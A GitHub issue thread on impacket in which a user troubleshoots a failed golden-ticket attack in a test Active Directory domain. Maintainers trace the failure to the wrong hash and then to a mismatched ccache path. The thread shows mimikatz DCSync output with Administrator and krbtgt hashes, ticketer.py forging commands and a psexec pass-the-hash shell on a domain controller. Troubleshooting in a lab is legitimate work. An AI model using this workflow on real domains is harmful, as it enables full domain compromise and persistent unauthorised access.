### ISSUE TITLE
KRB_AP_ERR_BAD_INTEGRITY with self-generated Gold Ticket

### ISSUE THREAD

**Issue by Donlouigi** [SecureAuthCorp/impacket#801]
### Configuration  
impacket version:  Impacket v0.9.21.dev1+20200313.160519.0056b61c
Python version:  2.7.17
Target OS:  Windows Server 2019

### Debug Output With Command String  
```
root@kali:~# python impacket/examples/psexec.py testdomain.de/Administrator@DC1.testdomain.de -k -no-pass -debug
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[+] StringBinding ncacn_np:DC1.testdomain.de[\pipe\svcctl]
[+] Using Kerberos Cache: /root/impacket/examples/Administrator.ccache
[+] SPN CIFS/DC1.TESTDOMAIN.DE@TESTDOMAIN.DE not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/TESTDOMAIN.DE@TESTDOMAIN.DE
[+] Using TGT from cache
[+] Trying to connect to KDC at TESTDOMAIN.DE
Traceback (most recent call last):
  File "impacket/examples/psexec.py", line 119, in doStuff
    dce.connect()
  File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 800, in connect
    return self._transport.connect()
  File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 410, in connect
    TGS=self._TGS)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 361, in kerberosLogin
    raise e
KerberosError: Kerberos SessionError: KRB_AP_ERR_BAD_INTEGRITY(Integrity check on decrypted field failed)
[-] Kerberos SessionError: KRB_AP_ERR_BAD_INTEGRITY(Integrity check on decrypted field failed)

```

### Additional context  
I generated a golden Ticket with impacket, i got the hash directly from the machine. Then i exported the ccache and tried the command above at Debug Output. klist shows the exported TGT. I could use the hash for a pass the hash attack with msfconsole. Does anyone have any idea why I get this error message?
```
root@kali:~/impacket/examples# python ticketer.py -nthash 96fea1e975ed1c7507ec7cdb36473c46 -domain-sid S-1-5-21-2581937525-1282777070-2486761147 -domain testdomain.de Administrator -debug
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for testdomain.de/Administrator
[+] VALIDATION_INFO after making it gold
VALIDATION_INFO 
CommonHeader:                   
    Version:                         1 
    Endianness:                      16 
    CommonHeaderLength:              8 
    Filler:                          3435973836 
PrivateHeader:                  
    ObjectBufferLength:              444 
    Filler:                          3435973836 
Data:                           
    LogonTime:                      
        dwLowDateTime:                   3199577984 
        dwHighDateTime:                  30801571 
    LogoffTime:                     
        dwLowDateTime:                   4294967295 
        dwHighDateTime:                  2147483647 
    KickOffTime:                    
        dwLowDateTime:                   4294967295 
        dwHighDateTime:                  2147483647 
    PasswordLastSet:                
        dwLowDateTime:                   3199577984 
        dwHighDateTime:                  30801571 
    PasswordCanChange:              
        dwLowDateTime:                   0 
        dwHighDateTime:                  0 
    PasswordMustChange:             
        dwLowDateTime:                   4294967295 
        dwHighDateTime:                  2147483647 
    EffectiveName:                   u'Administrator' 
    FullName:                        u'' 
    LogonScript:                     u'' 
    ProfilePath:                     u'' 
    HomeDirectory:                   u'' 
    HomeDirectoryDrive:              u'' 
    LogonCount:                      500 
    BadPasswordCount:                0 
    UserId:                          500 
    PrimaryGroupId:                  513 
    GroupCount:                      5 
    GroupIds:                       
        [
             
            RelativeId:                      513 
            Attributes:                      7 ,
             
            RelativeId:                      512 
            Attributes:                      7 ,
             
            RelativeId:                      520 
            Attributes:                      7 ,
             
            RelativeId:                      518 
            Attributes:                      7 ,
             
            RelativeId:                      519 
            Attributes:                      7 ,
        ] 
    UserFlags:                       0 
    UserSessionKey:                 
        Data:                            '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' 
    LogonServer:                     u'' 
    LogonDomainName:                 u'TESTDOMAIN.DE' 
    LogonDomainId:                  
        Revision:                        1 
        SubAuthorityCount:               4 
        IdentifierAuthority:             '\x00\x00\x00\x00\x00\x05' 
        SubAuthority:                   
            [
                 21,
                 2581937525,
                 1282777070,
                 2486761147,
            ] 
    LMKey:                           '\x00\x00\x00\x00\x00\x00\x00\x00' 
    UserAccountControl:              528 
    SubAuthStatus:                   0 
    LastSuccessfulILogon:           
        dwLowDateTime:                   0 
        dwHighDateTime:                  0 
    LastFailedILogon:               
        dwLowDateTime:                   0 
        dwHighDateTime:                  0 
    FailedILogonCount:               0 
    Reserved3:                       0 
    SidCount:                        0 
    ExtraSids:                       NULL 
    ResourceGroupDomainSid:          NULL 
    ResourceGroupCount:              0 
    ResourceGroupIds:                NULL 

[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[+] Customized EncTicketPart
EncTicketPart:
 flags=1356857344
 key=EncryptionKey:
  keytype=23
  keyvalue=tSvZesihgCKfjPsC

 crealm=TESTDOMAIN.DE
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   Administrator

 transited=TransitedEncoding:
  tr-type=0
  contents=

 authtime=20200320103851Z
 starttime=20200320103851Z
 endtime=20300318103851Z
 renew-till=20300318103851Z
 authorization-data=AuthorizationData:
  Sequence:
   ad-type=1
   ad-data=0x308202823082027ea00402020080a182027404820270040000000000000001000000cc01000048000000000000000a000000240000001802000000000000060000001400000040020000000000000700000014000000580200000000000001100800ccccccccbc010000cccccccc9f08000080afb5bea3fed501ffffffffffffff7fffffffffffffff7f80afb5bea3fed5010000000000000000ffffffffffffff7f1a001a00039a000000000000206f0000000000006dad000000000000e3810000000000006d450000000000009abb0000f4010000f40100000102000005000000249a00000000000000000000000000000000000000000000000000000fdd00001a001a00ace00000671300000000000000000000100200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d000000000000000d000000410064006d0069006e006900730074007200610074006f007200abab00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005000000010200000700000000020000070000000802000007000000060200000700000007020000070000000000000000000000000000000d000000000000000d000000540045005300540044004f004d00410049004e002e0044004500eeee04000000010400000000000515000000753de599ee9f754cbbf638940000000080afb5bea3fed5011a00410064006d0069006e006900730074007200610074006f0072000000000076ffffffedaa5880ae3bd4769b241c2db334e4cb0000000076fffffffa7cda509f2f9ce4f555f295eba52a3100000000




[*]     EncTicketPart
[*]     EncASRepPart
[+] Final Golden Ticket
AS_REP:
 pvno=5
 msg-type=11
 crealm=TESTDOMAIN.DE
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   Administrator

 ticket=Ticket:
  tkt-vno=5
  realm=TESTDOMAIN.DE
  sname=PrincipalName:
   name-type=2
   name-string=SequenceOf:
    krbtgt    TESTDOMAIN.DE

  enc-part=EncryptedData:
   etype=23
   kvno=2
   cipher=0x8342d38f22f56fe20b9cf9e9b47fc1dbcef5ef026cc0ded4e12a76d51e56b0c281cec30470bec9b3188b81d8a2330bcc82e61d3300f9e3d8a9431860043f9208b6f0e82a316073e5abebc8810279a7c3235f9571081283d604997c4c4c453a031824ad2a2b816a505790362ac541d8fec0f65190e957124dc27653d0a6c2941919cee184465cc80ee81bbae1838821d84431fd01f8462907aba02639b28da62a6ca49ed492a46c2df2573b71bc039350df1407863d3795fdc2f0c0882f9f8914810eacc5d13230f6f938c5d05b94a52adab434c8bbd749035ce3824065189cb1516c70ebc37518bf7c7b6b5e66a2f733f141bd2d9c0fe384c14d97fbaf3474329ab9cdb0843ff5384467abf1afa864969b456d1215acbd355bde8d1d1a934986ab9ef5e2c2ed3c3ab50b1f847cfeb4f5c24c487a5648965e581c9691c451ff57ddcc2ca2b4b9709e00c202f28f2ffbf621eb50266b5c90b681eb7f240539293be5c784b154d2eec7d8758d3e04cdce69468838b602b348aacdf6eff41c9660e82eb98c96c90f9a03543b93613c7df4f3a827f2d27c50c1eb1ff05494c545ce9b58b509f43014a094dabb950511527e8182e66a59861af5af83b650dbc984f09dfdc3120e826ef6c0692d04820b2c87978e1abe78fe1c63a91297a79f950f309a90dd22f15e48f162c686e6a67fce55b2bd7a92af444b196345213b290e6c5085bc7913d637ed516e07f52b7b28f8b6051b66135752527a0e6a2404b2d203faef6af53b5bd5147a6acc225bab588f5edd518dd6b1c39387a8d18dec490845311c89130745ec3ae9b569ef8ac227523c0a7be052bc215bdc0da418cc778ae5caf4b9a759b44e0e27c102b77e2645800c4696271f6d1c39c8302cc90ebfffc57ee11ea6d20e2654cd74137d0e3e4fb0d995d08d084395c4eb245afb4cd73b7bf1184124bb8d58b9b96344f3d5075722aba4c8f60ac141da73b8ea5ca14a7dde54da37e5468eab4cf541ae175b9c300c0c7939375088a9f3b8986f4fbbc2c1f1b6cd007877f0292efcbd12b49cdf74dbd1e6ae816f23ae8b62979300f4c2422efabf1ac7d9c610fc0e952f6fd5740b2107282c3de9868b193110f84712c77e017631bed4a39894434c8ba7cce2ca0629106cd6665e14e100f5be48887c31c72709fce4348590712fa18fa05798a3aaf4e0cb17323fef23b08a8c0633215e05565d0bc1c6ac2288a59896fee171


 enc-part=EncryptedData:
  etype=23
  kvno=1
  cipher=0x20a761a485f6e390f28947cece55fe3bfcd0741032108b4af8878b95a0127a982dd5193be8c1d566b323780e84207f4bc775542ccc89b150520d3d0797dd69b0e0002562a692e9412d8c7884f805a4a487b20e0156133305d2f3432925c416f206cb80311de641f3e32b56115b9f251a08df5be3b8a718975fe662d2436d2ce4c5c0b498c2d3b3b7c61a78e6b07515078bf6aac7c3ca2b1110db9832c2f430afa76510da3bdf902c3ea1a2653ce4b814626f10f8b6792073054f19ad37e15554632443170bcc411067824eec0296b476c9d942e12af7f122418137dd9148fd3a2de8ed5cea66241cf43c532448fa8e058b62953ae7b06c1a447b28f37dfc




[*] Saving ticket in Administrator.ccache
root@kali:~/impacket/examples# export KRB5CCNAME=/root/impacket/examples/Administrator.ccache

root@kali:~# klist -l
Principal name                 Cache name
--------------                 ----------
Administrator@TESTDOMAIN.DE    FILE:/root/impacket/examples/Administrator.ccache

```

**Comment by asolino** [comment]
Hey @Donlouigi 

Are you sure the `nthash` specified to `ticketer.py` is the `nthash` for the `krbtgt` account?

`KRB_AP_ERR_BAD_INTEGRITY` is usually returned when the wrong `nthash` was used to create the golden ticket.

**Comment by Donlouigi** [comment]
Hey @asolino,
thanks for your fast response.
I got the hash from mimikatz direct from the machine (its a test environment)
```
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::dcsync /domain:testdomain.de /user:Administrator
[DC] 'testdomain.de' will be the domain
[DC] 'DC1.TestDomain.de' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 06.02.2020 13:18:08
Object Security ID   : S-1-5-21-2581937525-1282777070-2486761147-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 96fea1e975ed1c7507ec7cdb36473c46

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : b1db57fc710cf168a7345e95c85158d3

* Primary:Kerberos-Newer-Keys *
    Default Salt : WIN-B3R41DAPQFPAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 1f06377f431e91b7e80eb5e8c74ef7e65707adf68c0fac0c7ad4f2c4aa492d63
      aes128_hmac       (4096) : 7ed766b648b8cf5af7e8adf0b5ee643b
      des_cbc_md5       (4096) : c216cea41531c4e5

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : WIN-B3R41DAPQFPAdministrator
    Credentials
      des_cbc_md5       : c216cea41531c4e5


mimikatz #
```
I could create a connection with the hash when i used the psexec script, so i think it's the right hash.
```
root@kali:~# python impacket/examples/psexec.py testdomain.de/Administrator@DC1.testdomain.de -hashes 00000000000000000000000000000000:96fea1e975ed1c7507ec7cdb36473c46 -debug
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[+] StringBinding ncacn_np:DC1.testdomain.de[\pipe\svcctl]
[*] Requesting shares on DC1.testdomain.de.....
[*] Found writable share ADMIN$
[*] Uploading file aBAGHXLg.exe
[*] Opening SVCManager on DC1.testdomain.de.....
[*] Creating service omRF on DC1.testdomain.de.....
[*] Starting service omRF.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1]
(c) 2018 Microsoft Corporation. Alle Rechte vorbehalten.

C:\Windows\system32>

```

Did i use the wrong hash?

**Comment by asolino** [comment]
Hey @Donlouigi 

Yup, you're using the Administrator's hash to create a golden ticket, when you actually need the `krbtgt`  account hash which is the account used to sign all TGTs inside a Windows Domain. Give it a try and use that account hash and let us know.

**Comment by Donlouigi** [comment]
Hey @asolino 
i got the same error again. Here is what i did.
Get the hash for the krbtgt Account:
```
mimikatz # lsadump::dcsync /domain:testdomain.de /user:krbtgt
[DC] 'testdomain.de' will be the domain
[DC] 'DC1.TestDomain.de' will be the DC server
[DC] 'krbtgt' will be the user account

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 06.02.2020 13:33:18
Object Security ID   : S-1-5-21-2581937525-1282777070-2486761147-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 9bb0581d70708766620e278e7192648d
    ntlm- 0: 9bb0581d70708766620e278e7192648d
    lm  - 0: d6d5071dff11e61db36cd224736d2dd0

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 149db3a6788bbac720dd2e4c513ec053

* Primary:Kerberos-Newer-Keys *
    Default Salt : TESTDOMAIN.DEkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : e41e159a259458df19ed277f98ebd58d5ecb06405bd033b1cfa632269157878d
      aes128_hmac       (4096) : 61f12f8e8c9d858f775964e317b16221
      des_cbc_md5       (4096) : da4fd39e9bab97f4

* Primary:Kerberos *
    Default Salt : TESTDOMAIN.DEkrbtgt
    Credentials
      des_cbc_md5       : da4fd39e9bab97f4

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  31969d6cbd116cab91bb23bc89c2a2ad
    02  fdc2f7ad520979e702d94c69473a9edb
    03  a50179e2fa3a9231d71ec3c4dee251b8
    04  31969d6cbd116cab91bb23bc89c2a2ad
    05  fdc2f7ad520979e702d94c69473a9edb
    06  cee99713ef7001ed4ae4f3e5710e9b2b
    07  31969d6cbd116cab91bb23bc89c2a2ad
    08  2de318ab604a2f356df05af7aa4eec65
    09  904ca9b95d49bd823c634469c299a78e
    10  1fc429721eb0995a8408af0837c81317
    11  ec018d1c9c718e3e4dc480ccc0e42ef1
    12  904ca9b95d49bd823c634469c299a78e
    13  8b4cb36df7643786287c4a16ebbd787a
    14  ec018d1c9c718e3e4dc480ccc0e42ef1
    15  01b31f7b9b9445adaa1bfec87233cc24
    16  5ac2340870bf9eaf5ad1cf40a6ddf74e
    17  fce77389fcfa6fdc23bcb7e2b5966e5a
    18  85a911fb4c8f20a6a0c185e2b8a787fb
    19  74bffadc43aed007fe4feaf20d94c28b
    20  41379c4947ba028f4f6eb09c2caaf19d
    21  3cb976c263f337bd1bada9d3a8729724
    22  3cb976c263f337bd1bada9d3a8729724
    23  6e69ed1b92351524249c93e9aa89e11a
    24  2f397a8a1b86056f36dc08d4e9463082
    25  c95d1ca56bd8a387a880fc832d78e187
    26  1943ec08fe946a9b7e82d255e8043fa0
    27  9560e5caabddcdb2673038500073ed59
    28  69133e98b67edc12498da4e2a10f8b9e
    29  83c42a7785991ca7189352aa40b1fb3e


mimikatz #
```
Create golden Ticket, export it and try to connect:
```
root@kali:~# python /root/impacket/examples/ticketer.py -nthash 9bb0581d70708766620e278e7192648d -domain-sid S-1-5-21-2581937525-1282777070-2486761147 -domain testdomain.de Administrator
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for testdomain.de/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in Administrator.ccache
root@kali:~# export KRB5CCNAME=/root/impacket/examples/Administrator.ccache 
root@kali:~# python impacket/examples/psexec.py testdomain.de/Administrator@DC1.testdomain.de -k -no-pass -debug
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[+] StringBinding ncacn_np:DC1.testdomain.de[\pipe\svcctl]
[+] Using Kerberos Cache: /root/impacket/examples/Administrator.ccache
[+] SPN CIFS/DC1.TESTDOMAIN.DE@TESTDOMAIN.DE not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/TESTDOMAIN.DE@TESTDOMAIN.DE
[+] Using TGT from cache
[+] Trying to connect to KDC at TESTDOMAIN.DE
Traceback (most recent call last):
  File "impacket/examples/psexec.py", line 119, in doStuff
    dce.connect()
  File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 800, in connect
    return self._transport.connect()
  File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 410, in connect
    TGS=self._TGS)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 361, in kerberosLogin
    raise e
KerberosError: Kerberos SessionError: KRB_AP_ERR_BAD_INTEGRITY(Integrity check on decrypted field failed)
[-] Kerberos SessionError: KRB_AP_ERR_BAD_INTEGRITY(Integrity check on decrypted field failed)
root@kali:~# klist -l
Principal name                 Cache name
--------------                 ----------
Administrator@TESTDOMAIN.DE    FILE:/root/impacket/examples/Administrator.ccache
root@kali:~# 
```
Have I missed anything or used a wrong hash again, slowly I am a bit confused?

**Comment by mohemiv** [comment]
Hi @Donlouigi!

You've generated a new golden ticket to `/root/Administrator.ccache`, but you've set `export KRB5CCNAME=/root/impacket/examples/Administrator.ccache`

**Comment by asolino** [comment]
Nice catch @mohemiv! 

Please recheck @Donlouigi

**Comment by Donlouigi** [comment]
Hello @mohemiv , Hello @asolino ,

now it works, this is embarrassing -.- :D

Thanks a lot for your support!!
